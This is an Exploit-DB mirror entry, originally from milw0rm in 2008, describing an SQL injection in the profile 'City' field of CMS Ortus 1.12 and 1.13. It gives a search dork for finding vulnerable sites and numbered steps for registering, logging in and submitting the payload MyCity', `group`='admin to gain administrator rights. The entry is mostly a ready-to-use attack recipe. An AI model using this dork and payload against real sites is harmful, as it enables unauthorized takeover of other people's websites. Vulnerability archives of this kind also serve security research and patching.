exploit-db-mirror/exploits/php/webapps/7237.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

50 lines
No EOL
869 B
Text

Author: otmorozok428, http://forum.antichat.ru
Products: CMS Ortus 1.12, CMS Ortus 1.13
Vendor: http://ortus.nirn.ru
Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip
Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg=
SQL Injection Vulnerability in POST Form:
http://www.site.com/index.php?mod=users_edit_pub
"City" field: [SQL Injection]
EXAMPLE:
1. You need to register first
http://www.site.com/index.php?mod=users_add
2. Authentication
http://www.site.com/index.php?mod=auth
3. Edit user profile next
http://www.site.com/index.php?mod=users_edit_pub
4. Exploit "City" field (receive admin rights)
MyCity', `group`='admin
5. Login to admin area
http://www.site.com/auth.php
You can see demo video here:
http://depositfiles.com/files/h8sbwikey
# milw0rm.com [2008-11-26]